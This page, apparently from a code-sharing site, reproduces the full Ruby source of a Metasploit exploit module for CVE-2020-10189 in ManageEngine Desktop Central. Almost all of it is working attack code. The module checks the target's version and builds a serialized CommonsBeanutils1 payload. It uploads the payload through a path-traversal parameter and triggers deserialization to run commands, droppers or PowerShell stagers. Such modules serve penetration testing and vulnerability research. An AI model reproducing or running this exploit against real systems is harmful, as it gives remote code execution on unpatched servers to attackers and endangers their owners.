扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::AutoCheck include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Desktop Central Java Deserialization', 'Description'=> %q{ This module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions < 10.0.474. Tested against 10.0.465 x64. "The short-term fix for the arbitrary file upload vulnerability was released in build 10.0.474 on January 20, 2020. In continuation of that, the complete fix for the remote code execution vulnerability is now available in build 10.0.479." }, 'Author' => [ 'mr_me', # Discovery and exploit 'wvu'# Module ], 'References' => [ ['CVE', '2020-10189'], ['URL', 'https://srcincite.io/advisories/src-2020-0011/'], ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] ], 'DisclosureDate' => '2020-03-05', # 0day release 'License'=> MSF_LICENSE, 'Platform' => 'windows', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets'=> [ ['Windows Command', 'Arch' => ARCH_CMD, 'Type' => :win_cmd ], ['Windows Dropper', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper ], ['PowerShell Stager', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager ] ], 'DefaultTarget'=> 2, 'DefaultOptions' => { 'RPORT'=> 8383, 'SSL'=> true, 'WfsDelay' => 60 # It can take a little while to trigger }, 'CmdStagerFlavor'=> 'certutil', # This works without issue 'Notes'=> { 'PatchedVersion' => Gem::Version.new('100474'), 'Stability'=> [SERVICE_RESOURCE_LOSS], # May 404 the upload page? 'Reliability'=> [FIRST_ATTEMPT_FAIL],# Payload upload may fail 'SideEffects'=> [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri'=> normalize_uri(target_uri.path, 'configurations.do') ) unless res return CheckCode::Unknown('Target is not responding to check') end unless res.code == 200 && res.body.include?('ManageEngine Desktop Central') return CheckCode::Unknown('Target is not running Desktop Central') end version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text unless version return CheckCode::Detected('Could not detect Desktop Central version') end vprint_status("Detected Desktop Central version #{version}") if Gem::Version.new(version) < notes['PatchedVersion'] return CheckCode::Appears("#{version} is an exploitable version") end CheckCode::Safe("#{version} is not an exploitable version") end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :win_cmd execute_command(payload.encoded) when :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end end def execute_command(cmd, _opts = {}) # XXX: An executable is required to run arbitrary commands cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper vprint_status("Serializing command: #{cmd}") # I identified mr_me's binary blob as the CommonsBeanutils1 payload :) serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( 'CommonsBeanutils1', cmd ) # XXX: Patch in expected serialVersionUID serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e" # Rock 'n' roll! upload_serialized_payload(serialized_payload) deserialize_payload end def upload_serialized_payload(serialized_payload) print_status('Uploading serialized payload') res = send_request_cgi( 'method' => 'POST', 'uri'=> normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'), 'ctype'=> 'application/octet-stream', 'vars_get' => { 'udid' => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart', 'filename' => 'logger.zip' }, 'data' => serialized_payload ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') end print_good('Successfully uploaded serialized payload') # C:\Program Files\DesktopCentral_Server\bin register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip') end def deserialize_payload print_status('Deserializing payload') res = send_request_cgi( 'method' => 'GET', 'uri'=> normalize_uri(target_uri.path, 'cewolf/'), 'vars_get' => {'img' => '\\logger.zip'} ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not deserialize payload') end print_good('Successfully deserialized payload') end end |
体验盒子
